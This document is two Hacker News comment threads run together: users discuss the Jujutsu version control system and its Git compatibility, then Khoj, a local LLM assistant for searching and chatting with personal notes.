- `jj log` is awesome for getting an overview of all your branches. If, like me, you have a lot of work in progress at once, this provides a great map
- Conflict resolution is really cool, as you can partially resolve conflicts, and then switch branches. Conflicts are also tracked specially, but I haven't done too much with this yet.
- The abbreviated changeset ids are really handy. I often will just `jj log` (or in my case just `jj` as that's the default), notice a changeset I want to rebase, then run `jj rebase -s qr -d master`. `qr` here is an abbreviated changeset id for a branch/commit, and usually much quicker than typing the branch name out! This will probably change when clap gets updated to support dynamic tab-completion though.
What happens if you accidentally save a file with some sort of secret that gets sucked in?
Are you simply using it with GitHub repos?
It mentions that it can be used with backends like Dropbox, but it would be wonderful if we finally had a system that could easily be used with IPFS. This is especially important for large data, since you can't store 1TB on github (and no, I don't count lfs, since you have to pay for it).
IPFS is the natural solution here, since everyone that wants to use the dataset has it locally anyway, and having thousands of sources to download from is better than just one.
So if this uses IPFS for the data repo, I'm switching immediately. If it doesn't, it's not worth looking into.
I'd be curious to know if someone is successfully using this in a team. How is it when two people are working in the same branch?
Explain how does it handle large binary files?
(the UX around this is the shortcoming of all current DVCS..)
Might want to look at purpose built tools for that such as lakeFS (https://github.com/treeverse/lakeFS/)
* Disclaimer: I'm one of the creators/maintainers of the project.
README says that the git backend is the recommended backend, as the 'native' one has no additional features, so I imagine: it handles them the same as git (ie. they are just objects in the .git repo data, and each time you change them you add a new one, and they are poorly compressible and optimizable) -- which is, I imagine, the problem you're referring to.
Now I'm curious: how would you want a DVCS to handle large binaries?
Jujutsu started as author's personal project and now author's full-time project at Google. It's presented at Git Merge 2022:
Jujutsu: A Git-Compatible VCS - Git Merge 2022:
Video:
Slides:
https://docs.google.com/presentation/d/1F8j9_UOOSGUN9MvHxPZX...
> started as author's personal project and now author's full-time project at Google
That's got to feel good!
I'm semi-sold on the idea of everything always being a commit, and lighter weight editing of those commits & structure, it sounds good. Except:
1. Not until I run some jj command? It's kind of begging for a 'jjd' isn't it? Or if you use an IDE you'd want/need it to be not just saving but doing some kind of 'jj nop'.
2. I haven't looked more into it than the readme, but that at least doesn't discuss (and I think it's important) withholding commits from the remote(s)? If everything's always(ish) committed, I've lost some control of untracked files or unstaged or locally stashed changes that I now need at the point of pushing; to mark those commits 'private' or something. I assume it does exist, and I'll look for it when I make time to play with it, but I find it slightly concerning (for how good it will be, or how important it's considered to be) that it's not more prominently discussed.
> Not until I run some jj command? It's kind of begging for a 'jjd' isn't it? Or if you use an IDE you'd want/need it to be not just saving but doing some kind of 'jj nop'.
In practice, I find that it doesn't matter much. Some people do run `jj` in a loop incidentally (usually they have a live graph-log open on some screen). I suppose that you could get a 'local history' feature like in some editors of more fine-grained changes to the codebase in this way. Folks have discussed adding a jj daemon, but so far it's not a priority.
> I haven't looked more into it than the readme, but that at least doesn't discuss (and I think it's important) withholding commits from the remote(s)? If everything's always(ish) committed, I've lost some control of untracked files or unstaged or locally stashed changes that I now need at the point of pushing; to mark those commits 'private' or something. I assume it does exist, and I'll look for it when I make time to play with it, but I find it slightly concerning (for how good it will be, or how important it's considered to be) that it's not more prominently discussed.
Usually it's pretty obvious to me which of my commits are public or private. When interfacing with GitHub, commits that are not reachable by a branch are definitely private . Additionally, commits without a description are private, and `jj git push` will warn you before allowing you to push them.
There has been some discussion about adopting Mercurial-style 'phases' (https://wiki.mercurial-scm.org/Phases), which would explicitly accomplish the goal of marking commits public or private.
The jj daemon thing is something I've had on my mind to maybe hack up, but in practice it's not that huge of a deal I've found.
It is worth noting that jj is designed as a CLI and a library. So, for the hypothetical IDE integration, it could use its own custom written daemon or just integrate all this as part of its autosave functionality via the Rust crates. That's the long-term goal, anyway.
Do I understand this correctly?
This is some kind of background process that automatically commits any changes you make.
You can use the CLI to check what it did and if you want to modify the auto commits.
No daemon, it happens 'whenever you run a command'.
> Commands snapshot the working copy before they start, then the update the repo, and then the working copy is updated (if the working-copy commit was modified). Almost all commands (even checkout!) operate on the commits in the repo, leaving the common functionality of snapshotting and updating of the working copy to centralized code.
> If an operation results in conflicts, information about those conflicts will be recorded in the commit(s). The operation will succeed. You can then resolve the conflicts later.
I'm really glad people are trying this out. I've spent the last decade or so playing with collaborative editing algorithms. Ideally I'd like tools like git to eventually be replaced by CRDT based approaches. CRDTs would let us use the same tools to do pair programming. CRDTs also handle complex merges better (no self-conflicts like you can get with git). And they're generally a more powerful model.
One problem with all modern text CRDTs (that I know of) is that they do automatic conflict-free resolution of concurrent edits. But when we collaborate offline on code, we usually want conflicts to show up and be resolved by hand. CRDTs should be able to handle that no problem - they have more information about the edit history than git, but doing this properly will (I think) require that we put the conflicts themselves into the data model for what a text file is. And I'm not sure how that should all work with modern text editors!
Anyway, it sounds like jj has figured out the same trick. I'm excited to see how well it works in practice. With this we're one step closer to my dream of having a crdt based code repository!
You should check out Pijul, as it essentially implements everything you mentioned here. Pijul works on patches which are CRDTs, it makes conflicts a first-class concept, etc.
Have you not ever found any value in `git bisect`?
If you have a bug which is reproducible, but whose cause is complex, do you not think it's useful to be able to find the commit that introduced the bug in order to see which change caused it? If only to get a good first idea of what might need to be fixed?
Currently, `git bisect` works best if every commit is buildable and runnable, in order that any commit can be automatically tested for the presence of the bug, to narrow down the problem commit as quickly as possible. If some commits don't build or run because they contain conflict markers, this make `git bisect` need a lot more manual intervention.
Can you think of a way in which an equivalent of `git bisect` might be adapted to work in this scenario?
Note that just scanning for conflict markers might not be appropriate, in case a file legitimately contains text equivalent to conflict markers - e.g. in documentation talking about conflict markers, or something like `=======` being usable as an underline in some markup languages.
> Ideally I'd like tools like git to eventually be replaced by CRDT based approaches. CRDTs would let us use the same tools to do pair programming. CRDTs also handle complex merges better (no self-conflicts like you can get with git). And they're generally a more powerful model.
I'd be interested to see how this plays out in practice.
It seems to be in conflict with the idea that scm history is a meaningful deliverable that should be arranged as series of incremental atomic changes before a patch series leaves your development machine.
However, most developers I interact with already treat git history as an infinite editor undo history, this approach seems like it would crystalize that fact.
How do you envision the (long-term) history working? Do you think it would provide more/less utility?
This project is a great example of subliminal marketing.
It is less apparent now but still, the repeated flex of "Google", 20% project etc when no typical reader would assume them is classic corporate charlatanry.
Shame because I like the project otherwise
It may be a calculated move. But, more charitably, perhaps it is simply unpolished communication.
Looks really cool! One thing I'm not clear on from the docs: does it support ignoring changes to some files for 'real' commits? For example, a repo at work has a file used for mocking up feature flags. The file is tracked but it's encouraged to edit it when testing things, just don't commit your changes. If I'm not mistaken, I'd have to remember to undo changes to that file before 'describing' the commit. Is that right?
The commit will indeed be created immediately, there's no way to prevent that except for .gitignore I'm aware of. Until you run `jj describe`, it won't have a description.
However, if you don't manually put a branch on it, it'll never get pushed and will stay on your machine only.
You can sit on this personal commit and rebase it on top of any other commit to move around the repo, again and again if you like.
I know the nuisance of having to tiptoe around files you don't want to add to history.
In case it helps your use case:
git update-index --assume-unchanged <file>
git update-index --no-assume-unchanged <file>
This would ignore changes while you're testing - but you have to remember to turn it off or, iiuc, you won't pull intentional changes either.You might find hooks useful too. Not to assume your knowledge, these are shell scripts placed in .git/hooks that are invoked, e.g., before commit or before push. You could have it parse git status, detect changes to <file>, prompt for confirmation if changed and remove from working set if the change is unintentional.
Looks interesting. Unfortunately doesn't support signing commits - apparently it's possible via 'jj export' and using classical git:
https://github.com/martinvonz/jj/issues/58#issuecomment-1247...
The plan for how the add signed commits is there, and the work isn't that hard (especially as gitoxide continues to add functionality), it just has to be pushed over the line and I've been a bit slack on getting that going.
There's definitely nothing foundational blocking it though and it will happen one day if you'd like to give it a go in the meantime.
This looks promising. One question I had after reading about its git compatibility is that they seem mostly focused on the use case where a Jujutsu user accesses a git repository (hosted by e.g. GitHub) with jj. But does it support the converse way of working, i.e. accessing a native Jujutsu repository with git?
I ask this because most developers are already quite familiar with the git CLI so in production use one would probably see developers co-working with jj and git in the same codebase. Or would the realistic production scenario be always using git (as opposed to native Jujutsu database) as the backing storage to allow accessing both with git and jj CLIs?
The README's footnote:
At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend.
I would assume there would always be the expectation that you either use Jujitsu as a frontend to a git repo, or have a complete Jujitsu based remotes.
If you're going to work on and contribute to a project that is already using Jujitsu, it is reasonable to expect that you'd adapt your workflow to the project itself and not the other way around.
This Git-compatibility-first approach makes Jujutsu seem like a stronger contender to replace Git than I've seen so far.
I'm curious about its management of conflicts. I know that pmeunier has taken a lot of care to formally work out a theory of patches to drive Pijul, and that unsound or problematic notions of patches/conflicts can lead to serious problems— they say that's what led to all the performance problems with Darcs, right? I'd love if the comparison page on the repo wiki gave a little more detail than that Pijul's handling of conflicts seems 'similar'.
There is a little more detail here: https://github.com/martinvonz/jj/blob/main/docs/technical/co...
Storing the conflicts symbolically in this way lets you reproduce the conflicts later and even auto-resolve certain conflicts, but it doesn't address resolving the actual contents of conflicts. You could probably use Pijul as a jj backend and get the best of both worlds (if someone were to implement it).
I am certainly no expert in version control systems, but I've gotta say that it's really wonderful to see a project that builds on the algorithmic and cultural successes of Git but with a simplified and modernized approach. The reason that Git took over the open-source world is two-fold: first, it was adopted by Linux, which ended up being the most influential OSS project of all time. Second, the Git model, which is distributed and egalitarian at its core, is a natural model for a fast-paced, globally distributed community of developers. These are both reasons to appreciate Git, but they do not imply that Git is the final word in version control. I'm excited to see innovation in this space!
> which is distributed and egalitarian at its core, is a better model for a fast-paced, globally distributed community of developers than previous monorepo systems like Mercurial
I'm a bit confused by this. I don't think that's what monorepo means, is it? Monorepo is what you choose to put in a repo? And I thought Mercurial was extremely similar to Git as it's also a DVCS?
I am too; it's hard, now, to imagine anything dethroning git, but presumably something will do so one day, and this could be that thing.
SQLite uses a custom vcs called Fossil, but doesn't make much effort to push broader adoption (afaics) so it remains academic at this point.
Jujutsu keeping git compatibility looks like a differentiator that reduces cost of adoption. I'm excited!
It's nice to have alternatives and maybe I have Stockholm Syndrome about this topic, but isn't git's complexity inherent to the area?
Git fails to make the common paths simple. There's no need for most of the complexity to be so prevalent in day to day use
I would say 'What a weird name for a VCS. Whether that will work ...', but then I have to remind myself of the dictionary meaning of 'git'. So who knows. Maybe we will be adopting all kinds of martial arts terminology. For example: 'I use Karate to manage my code. I divide everything using chops. When a kata is done, ...'
It's a horrible name to pronounce for many non-English speakers.
what's the advantage of native backend compared to git repo backend?
> At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend.
From the README, no advantage for now.
I haven't really used git on the command line for years now, except for some special cases. In my daily usage, I rely on the built-in IDE integration (IntelliJ, FWIW), and I don't understand why anyone would put up with doing it manually. I can do partial commits by selecting individual lines right in my editor. I can view all branches, merge them, cherry-pick from them, commit stuff or amend it, pull updates, edit tags - everything at once, with keyboard shortcuts.
Apparently, I'm in the minority here (also considering all the talk about git being such an essential skill that real programmers can issue commands blindfold). Why is that?
I don't know about 'real' programmers, but I have an, admittedly, irrational fear of git GUIs doing the wrong thing. Even in Intellij, I open the built in CLI to interact with git. Old habits die hard :)
How well does your integration handle stacked PRs (if at all)? I find that the majority of my interaction with git is super basic that I get no value add replacing `git add -p` (esp. since I'm always in my terminal with Vim/tmux).
What _is_ annoying and something I could probably automate if I thought about it for more than a few minutes is when:
a) I have stacked PRs for isolation/workflow purposes in the form of: A <- B <- C
b) we use squash and merge
c) now when A gets merged I need to fix B and C because while the change set is the same the history is not (because of the squash & merge)
d) when B gets merged I have to fix C for the same reasons
My experience with IDE integration is that it never implements the full feature set of the git CLI. It's probably improved, but I've generally found that anything besides basic clone/branch/commit/merge with very few developers and branches eventually leads to having to resort to the git CLI to resolve issues.
A lot of people who are starting out using git don't understand how git works (what a commit is, what a branch is, what you can do to them). And they start to blame the CLI tool and start to hope that using the GitHub Desktop app will make everything make sense. This is the most common context where people say "you have to learn the git CLI."
(Here's an example from a few days ago from someone who proposes using GitHub Desktop in order to avoid learning git commands: https://www.reddit.com/r/learnprogramming/comments/15b7pra/s...)
> I rely on the built-in IDE integration (IntelliJ, FWIW)
That you're using IntelliJ makes a huge difference. VSCode's git integration is okay, but I honestly just reach for the command line if I'm using VSCode for a project. IntelliJ's, though, is hands down the best git UI out there. Even standalone apps can't compete with the convenience of having all the features bundled directly into your editor.
From what I've seen, a lot of people have tried git integrations in other IDEs and found that they are missing functionality and the features they do have aren't well done, so they assume that all git integrations will be the same. But as I've been reading through all the jj testimonials here, I can't help thinking that I already have all of this through the IntelliJ git plugin.
Because I have two types of people who understand git on my team. People who use the CLI and people who don't understand git and just start clicking buttons
I have realized I have 15 years of git experience (incredible if true) and just got really, really used to it. Still excited if jj is a good follow-up since it sounds like it's not too far away from git's model.
Because I have always and will always prefer to interact with my VCS on the command-line.
The skillset is portable across environments (I can remote into a box and look at a repo as easily as I can interact with one locally), across editors (I don't have to learn and re-learn how each editor interacts with the VCS), and I can use all my familiar tools to work with it.
As for those workflow examples, I can just as easily do all those things via the command-line. The editor integration isn't anything special. And when I need to something weird and advanced (e.g. interacting with the reflog), odds are I'm gonna have to bust out those command-line skills, anyway.
Why would that be so hard to believe?
Edit: BTW, to be clear, I have no issues with people using GUIs. If you're productive with your tooling, who am I to judge? But you asked why, so I answered why. I don't claim my way is any better than your way.
Either it's employers who got tired of people not even knowing the basics of git (which would be common to any dvcs) and weren't productive as a result.
Or it's folks that think the base set of linux tools are the be-all-end-all of programming. ('Why use Dropbox when I can rsync', 'Use the ext4 filesystem as a database and store metadata in inodes and use git for MVCC', 'I will do sed | awk | cut | xargs find | tr instead of a 10 line python script').
Or it's folks that cult-follow one of the two groups above.
Has anyone tried both this and Sapling? https://engineering.fb.com/2022/11/15/open-source/sapling-so...
Both of these are on my TODO lists but haven't had time to try them yet.
Check out https://github.com/martinvonz/jj/blob/main/docs/sapling-comp...
In my opinion:
- Sapling is much more mature/full-featured at this point. - Jujutsu improves source control workflows in a more principled way. - Jujutsu currently supports colocation with a Git repo, while Sapling requires that the Git repo be kept separately.
'working copy is automatically committed' seems like a good idea at first glance, but there are many situations where this is not a good idea:
- when new artefact files are added and you have not yet added them to .gitignore, they'll be automatically committed
- when you have added ignored files in one branch and switch to another branch, the files will still be in your working copy but not listed in your .gitignore file, and would then be automatically committed
- staging only some files and comitting is much easier than splitting a commit after the fact
I most definitely agree. To be honest I know I go against the current here, but so far there is nothing I really like from what I've seen in jj. I should try it for real, see how it feels when using it to get a better sense of it.
> - staging only some files and comitting is much easier than splitting a commit after the fact
I see this project as a challenge to that conventional wisdom. This view is certainly the one I have embedded in my mind. But is it right? I end up fixing up the index and amending commits post facto quite often. I can also do it pre facto. But in a world where you can't fully avoid editing after the fact, mightn't it be better to have a single workflow for this kind of editing? That is, if you can't totally get rid of post facto commit editing (which I think is reality), can you actually get rid of pre facto editing, and be left with just one editing workflow? If so, maybe that's good!
I haven't used this yet, but this strikes me as a very plausible attack on a conventional wisdom that we take for granted but may not actually be doing us any favors.
I'm of the same opinion as you, here. I generally have 10+ 'extra' files in my project directory (output files, notes, one-off scripts for certain things, etc). When I add files to a commit, I do it by filename, never 'everything that's new/changed'. I don't have a use case for 'everything I've created/changed goes into the commit, always'.
> switch to another branch, the files will still be in your working copy but not listed in your .gitignore file
This is a failing of git, imo. There should be a .local.gitignore to somesuch, that is 'added to' .gitignore. It's VERY common for me to have files that I want ignore, but are specific to me; they don't belong in the project's .gitignore. I know there are ways to do this, but all of them are clunky. There should be a simple, out of the box way to do it.
> staging only some files and comitting is much easier than splitting a commit after the fact
Re this point, how is it any different? 'Staging' the files is essentially the same as splitting the commit, anyways — it's just that the newly-split contents go into a 'staging area' vs a commit. Do you mean that the tooling to accomplish this is not good?
I don't see how these things are an issue in jjs design, nor do I see how staging some files is easier than splitting a commit after the fact...
Check out the documentation, many of the cases you are concerned about are explicitly mentioned:
https://github.com/martinvonz/jj/blob/main/docs/git-comparis...
Related DVCS: https://pijul.org/
I need to try it out at $WORK since constant rebasing on a busy repo with a hundred or so committers is not fun.
Pijul needs a 1.0 release if it wants wide adoption. I don't understand why they wait.
Meanwhile, if rebasing on git is an issue, you should probably try stacked-git (https://stacked-git.github.io/). It manages commits as a stack of patches - like quilt, but on top of git.
I just find another alternative to Git called Grace. It's made by a Microsoft employee with F#.
I saw the presentation, its about having cloud ready or cloud native scm, i dont think this is a great idea
git is about working locally github (or similar solutions) is the cloud part
cloud native scm sound like a bad idea
I've just started looking into this, and since this seems to be doing a few automatic rebases under the hood, I wonder how this behave if commits get randomly pushed to origin. For git is always obvious when you are about to amend/overwrite a pushed HEAD and you can push forcefully only explicitly.
Edit: anonymous branches are destined to be pushed remotely (to be reviewed and merged) and there is no local merge as far as I can tell, you can name these branches but no 'merge back to development branch once done'. Completely different workflow, having the ability to merge or 'collapse' the anonymous branch to its parent would be nice, when you don't really need to push your feature branches anywhere.
> I wonder how this behave if commits get randomly pushed to origin
You would expect the push to fail in the normal way, as if you had manually done the rebase, because your commit history may have diverged. That being said, I don't think this happens much in practice: the automatic rebases are typically for explicit history-rewriting operations that users tend to only do on their local work. If a user prefers to use a 'no-rewriting' workflow, then they can certainly do so by simply not issuing the history-rewriting commands.
> anonymous branches are destined to be pushed remotely (to be reviewed and merged) and there is no local merge as far as I can tell, you can name these branches but no 'merge back to development branch once done'.
I'm not sure what you mean by this. You can do `jj merge` in a similar way to `git merge`, or you can do a rebase workflow.
554 points 2 days ago by 110 in 10000th position
github.com | | comments | anchor
Type
Name
Latest commit message
Commit time
July 27, 2023 15:28
July 30, 2023 02:07
July 30, 2023 22:37
July 30, 2023 19:27
July 28, 2023 18:47
July 11, 2023 18:43
July 28, 2023 19:27
July 28, 2023 19:27
I'm not a software dev.
Is there a way to have this bot read from a discord and google drive?
gpt4all itself (the library on the backend for this) has a similar program [1]. You just need to put everything into a folder. This should be straight forward for google drive. Harder for discord though but I'm sure theres a bot online that can do the extraction.
Heads up, docker build fails with:
#12 2.017 ERROR: Could not find a version that satisfies the requirement pyside6>=6.5.1 (from khoj-assistant) (from versions: none)
#12 2.017 ERROR: No matching distribution found for pyside6>=6.5.1
------
executor failed running [/bin/sh -c sed -i 's/dynamic = \['version'\]/version = '0.0.0'/' pyproject.toml && pip install --no-cache-dir .]: exit code: 1
Darn, I've seen this error a couple of times. Can you drop a couple of details in this Github issue? https://github.com/khoj-ai/khoj/issues/391
I'm particularly interested in your OS/build environment.
I have not tried it but something like this should exist. I don't think it is going to be as useable on consumer hardware as yet unless you have a good enough GPU but within couple of years (or less), we'll be there I am sure.
Irrelevant opinion - The logo is beautiful, I like it and so are the colours used.
Lastly, LLMA2 for such use cases, I think is capable enough that paying for ChatGPT won't be as lucrative especially when privacy is of concern.
Keep it up. Good craftsmanship. :)
Thanks! I do think Llama V2 is going to be a good enough replacement for ChatGPT (aka GPT3.5) for a lot of use cases.
From previous answers it appears you're using standard lama-7b (quantized to 4 bits). I suppose you're doing a search on the notes than you pass what you found with the original query to lama. This technique is cool, but there are many limitations. For example lama's content length.
I can't wait for software that will take my notes each day and fine tune a LLM model on them so I can use entire context length for my question/answers.
> I can't wait for software that will take my notes each day and fine tune a LLM model on them so I can use entire context length for my question/answers
Problem is finetuning does not work that way. Finetuning is useful when you want to teach a model about a certain pattern, not when you want it output it right. Eg: With enough finetuning and prompts, a model will be able to output the result in a certain format that you need, but it does not guarantee that it would not be hallucination prone. The best way to minimize hallucination is still embedding based retrieval passed along with the question/prompt.
In future, there can be a system where you can build a knowledge base for LLMs, and tell it to access that for any knowledge, and finetune it for the patterns you want the output in.
How does one access this from a web browser?
We have a cloud product you can sign up for, but it's more limited in what data sources it supports. It currently only works for Notion and Github indexing. If you're interested in that, send me a dm on Discord - https://discord.gg/BDgyabRM6e
But that would allow you to access Khoj from the web.
[flagged]
hi, you seem keen to share something neat you took less than 10 minutes to implement, I'd love to see that?
As someone who's been getting int o using Obsidian and messing around with chat ais, this is excellent, thank you!
This seems like a cool project.
It would be awesome if it could also index a directory of PDFs, and if it could do OCR on those PDFs to support indexing scanned documents. Probably outside of the scope of the project for now, but just the other day I was just thinking how nice it would be to have a tool like this.
Yeah being able to search and chat with PDF files is quite useful.
Khoj can index directory of PDFs for search and chat. But it does not currently work with scanned PDF files (i.e not with ones without selectable text).
Being able to work with those would be awesome. We just need to get to it. Hopefully soon
Ive wanted a crawler on my machine for auto-categorizing and organizing, tagging and moving ALL my files around based on all my machines - so the ability to crawl PDFs, downloads, screenshots, pictures, etc and give me a logical tree of the org of the files - and allow me to modify it by saying 'add all PDF related to [subject] here and the organize by source/author etc... and then move all my screenshots, ordered by date here
etc...
I've wanted a 'COMPUTER.', uh... I say 'COMPUTER!', 'sir, you have to use the keyboard', ah a Keyboard, how quaint.... forever.
I tried the search using Slavic language (all my notes are in Slovene) - it performed very poorly: if the searched keyword was not directly in the note itself, the search results seemed to be more or less random.
Search should work with Slavic languages including Russian and 50+ other languages.
You'll just need to configure the asymmetric search model khoj uses to paraphrase-multilingual-MiniLM-L12-v2 in your ~/.khoj/khoj.yml config file
See http://docs.khoj.dev/#/advanced?id=search-across-different-l...
[flagged]
Please don't post low effort, shallow dismissals; without substantiation you're not posting anything useful, you're just a loud asshole.
Just a heads up, your landing page on your website doesn't seem to mention Llama/the offline usecase at all, only online via OpenAI.
----
What model size/particular fine-tuning are you using, and how have you observed it to perform for the usecase? I've only started playing with Llama 2 at 7B and 13B sizes, and I feel they're awfully RAM heavy for consumer machines, though I'm really excited by this possibility.
How is the search implemented? Is it just an embedding and vector DB, plus some additional metadata filtering (the date commands)?
> Just a heads up, your landing page on your website doesn't seem to mention Llama/the offline usecase at all, only online via OpenAI.
I am sufficiently uneducated on the ins and outs of AI integrations to always wonder if projects like this one can be used in local-only mode, i.e. when self-hosted ensuring me that never any of my personal information is sent to a remote service. So it would be very helpful to very explicitly give me that assurance of privacy, if that's the case.
Thanks for the pointer, yeah the website content has gone stale. I'll try update it by end of day
Khoj is using the Llama 7B, 4bit quantized, GGML by TheBloke.
It's actually the first offline chat model that gives coherent answers to user queries given notes as context.
And it's interestingly more conversational than GPT3.5+, which is much more formal
What's the recommended 'size' of the machine to run this?
I tried to run it on a pretty beefy machine (8 core cpu/32 GB RAM) to use with ~40 odd PDF documents. My observation is that the queries (chat) takes forever and also getting Segmentation fault (core dumped) for every other or so query.
Thanks for the feedback. Does your machine have a GPU? 32GB CPU RAM should be enough but GPU speeds up response time.
We have fixes for the seg fault[1] and improvement to the query speed[2] that should be released by end of day today[3].
Update khoj to version 0.10.1 with pip install --upgrade khoj-assistant later today to see if that improves your experience.
The number of documents/pages/entries doesn't scale memory utilization as quickly and doesn't affect the search, chat response time as much
[1]: The seg fault would occur when folks sent multiple chat queries at the same time. A lock and some UX improvements fixed that
[2]: The query time improvements are done by increasing batch size, to trade-off increased memory utilization for more speed
[3]: The relevant pull request for reference: https://github.com/khoj-ai/khoj/pull/393
Could this do something like take in the contents of my web history for the day and summarize notes on what I've been researching?
This is getting very close to my ideal of a personal AI. It's only gonna be a few more years until I can have a digital brain filled with everything I know. I can't wait
That would be pretty awesome. Building a daily web history summarizer as a browser extension shouldn't be too much work. I bet there's something like that already out there.
Having something that indexes all your digital travels and makes it easily digestible will be gold. Hopefully Khoj can become that :)
Interesting, this is the exact question that came to mind for me. This would address a pain point for me.
Does anyone have recommendations for a tool that does it?
Or, anyone want to build it together?
I'm in search of a new Macbook Mx. what is the requirements for running these model locally without breaking the bank? Would 32GB be enough?
I've been playing with Khoj for the past day - it's really neat, well done!
A few observations:
1. Telemetry is enabled by default, and may contain the API and chat queries. I've logged an issue for this along with some suggestions here: https://github.com/khoj-ai/khoj/issues/389
2. It would be advantageous to have configuration in the UI rather than baking it's YAML into the container image. (added a note on that in the aforementioned issue on Github).
3. It's not clear if you can bring your own models, e.g. can I configure a model from huggingface/gpt4all? if so, will it be automatically downloaded based on the name or should I put the .bin (and yaml?) in a volume somewhere?
4. AMD GPU/APU acceleration (CLBLAS) would be really nice, I've logged an issue for this feature request as well. https://github.com/khoj-ai/khoj/issues/390
Thanks for the feedback! Much appreciated.
I responded in the issue, but I'll paste here as well for those also curious:
Khoj does not collect any search or chat queries. As mentioned in the docs, you can see our telemetry server[1]. If you see anything amiss, point it out to me and I'll hotfix it right away. You can see all the telemetry metadata right here[2].
[1]: https://github.com/khoj-ai/khoj/tree/master/src/telemetry
[2]: https://github.com/khoj-ai/khoj/blob/master/src/khoj/routers...
Configuration with the `docker-compose` setup is a little bit particular, see the issue^ for details.
Thanks for the reference points for GPU integration! Just to clarify, we do use GPU optimization for indexing, but not for local chat with Llama. We're looking into getting that working.
Would it be possible to support a custom URL for the local model, such as running ./server in ggml would give you?
This may be more difficult if you are pre-tokenizing the search context.
Very cool project.
Something I've noticed playing around with Llama 7b/13b on my Macbook is that it clearly points out just how little RAM 16GB really is these days. I've had a lot of trouble running both inference and a web UI together locally when browser tabs take up 5GB alone. Hopefully we will see a resurgence of lightweight native UIs for these things that don't hog resources from the model.
Or hopefully we will see an end of the LLM hype.
Or at least models that don't hog so much RAM.
The new Chrome 'memory saver' feature that discards the contents of old tabs saves a lot of memory for me. Tabs get reloaded from the server if you revisit them.
FWIW I've also had browser RAM consumption issues in life, but it's been mitigated by extensions like OneTab: https://chrome.google.com/webstore/detail/onetab/chphlpgkkbo...
For now, local LLMs take up an egregious about of RAM, totally agreed. But we trust the ecosystem is going to keep improving and growing and we'll be able to make improvements over time. They'll probably become efficient enough where we can run them on phones, which will unlock some cool scope for Khoj to integrate with on device, offline assistance.
Awesome work, I've been looking for something like this. Any plans to support Logseq in the future?
Yes, we hope to get to it soon! This has been an ask on our Github since a while[1]
Hey, I saw Khoj hit HN a few weeks ago and get slaughtered because the messaging didn't match the product.
You've come a good way in both directions: the messaging is clearer about current state vs aspirations, and you've made good progress towards the aspirational parts.
Really glad to see the warm reception you're getting now. Nice job, y'all.
Hey ubertaco! I remember you. Appreciate the well-wishes. The landing page still needs some tweaking. It's kind of hard keeping what you're building in sync with what you're aspiring for, but we're definitely working towards it.
Interesting. The obvious question you haven't answered anywhere (as far as I can see) is what are the hardware requirements to run this locally?
Ah, you're right, forgot to mention that. We use the Llama 2 7B 4 bit quantized model. The machine requirements are:
Ideal: 16Gb (GPU) RAM
Less Ideal: 8GB RAM and CPU
Feedback for landing page: use a fixed height container for the example prompts. Without it, it causes jumping while scrolling down the page making other sections hard to read. iOS Safari
Thanks for the feedback! Someone else mentioned this issue the other day as well. I'll fix this issue on the landing page soon
This would be even great if available as a Spotlight Search replacement (with some additional features that Spotlight supports).
Yeah, this would be ideal for Mac users. Just need to look into what is required and how much work it is
Two comments
1. If you want better adoption especially among corporations, GPL-3 wont cut it. Maybe think of some business friendly licenses (MIT etc)
2. I understand the excitement about llm's. But how about making something more accessible to people with regular machines and not state of art. I use rip-grep-all (rga) along with fzf [1] that can search all files including pdfs in a specific folders. However, I would like a GUI tool to
(a) search across multiple folders,
(b) provide priority of results across folders, filetypes and
(c) store search histories where I can do a meta-search.
This is sufficient for 95% of my usecases to search locally and I don't need LLM. If khoj can enable such search as default without LLM that will be a gamechanger for many people without a heavy compute machine or who dont want to use OpenAI.[1] https://github.com/phiresky/ripgrep-all/wiki/fzf-Integration
That seems like a pretty trivial thing to implement. Why not do it yourself?
If corporations have no issue with using restrictive proprietary licenses, they should not have any issues with the GPL.
Just a note to suggest that giving away your hard work to those who will profit from it in the hope that they will remember you later seems like a pretty dubious exchange.
Have a look at how that worked out for the folks who built node and its libraries versus the ones who maintained control of their work (like npm).
Hi, my dream app ! Will it work on non english sources ?
To use Chat with non-english sources you'll need to enable OpenAI. Offline chat with Llama 2 can't do that yet.
And Search can be configured to work with 50+ languages.
You'll just need to configure the asymmetric search model khoj uses to paraphrase-multilingual-MiniLM-L12-v2 in your ~/.khoj/khoj.yml config file
For setup details see http://docs.khoj.dev/#/advanced?id=search-across-different-l...
Really cool to see this! Local is the real future of AI.
I got really excited about this and fired it up on my petite little M2 Macbook Air only for it to grind it to a halt. Think the old days when you had a virus on your PC and you'd move the mouse then wait 45 seconds to see the cursor move. It honestly made me feel nostalgic. I guess I have to taper performance expectations with this Air, though this is the first time it's happened.
This is very cool, the Obsidian integration is a neat feature.
Please, someone make a home-assistant Alexa clone for this.
Thanks!
We've just been testing integrating over voice, whatsapp over the last few days[1][2] :)
[1]: https://github.com/khoj-ai/khoj/tree/khoj-chat-over-whatsapp...
[2]: https://github.com/khoj-ai/khoj/compare/master...features/wh...
Would anybody be able to recommend any standalone solution (essentially data must not leave elsewhere) to chat with documents with a web interface?
I tried privategpt but results were not great.
Khoj provides exactly that; it runs on your machine, none of your data leaves your machine and it has a web interface to chat
Cool project. I tried it last time this got posted, but it was still a bit buggy. Giving it another shot - I'm mainly interested in the local chat.
Could you elaborate on the incremental search feature? How did you implement it? Don't you need to re-encode the full query through a SBERT or such as each token is written (perhaps with debouncing)?
Also, having an easily-extended data connector interface would be awesome, to connect to custom data sources.
Buggy for setup? We've done some improvements and have desktop apps (in beta) too now to simplify this. Feel free to report any issues on the khoj github. I can have a look.
Yes, we don't do optimizations on the query encoding yet. So SBERT just re-encodes the whole query every time. It gets results in <100ms which is good enough for incremental search.
I did create a plugin system, so that a data plugin just has to convert the source data into a standardized intermeditate jsonl format. But this hasn't been documented or extensively tested yet.
It's funny that you mention `C-s`, because `isearch-forward` is usually used for low-latency literal matches. In what workflow can Khoj offer acceptable latency or superior utility as a drop-in replacement for isearch? Is there an example of how you might use it to navigate a document?
That's (almost) exactly what khoj search provides a search-as-you-type experience but with a natural language (instead of keyword) search interface.
My workflow looks like: 1. Search with Khoj search[1]: `C-c s s` <search-query> RET 2. Use speed key to jump to relevant entry[2]: with `n n o 2`
[1]: `C-c s` is bound to `khoj` transient menu [2] https://orgmode.org/manual/Speed-Keys.html
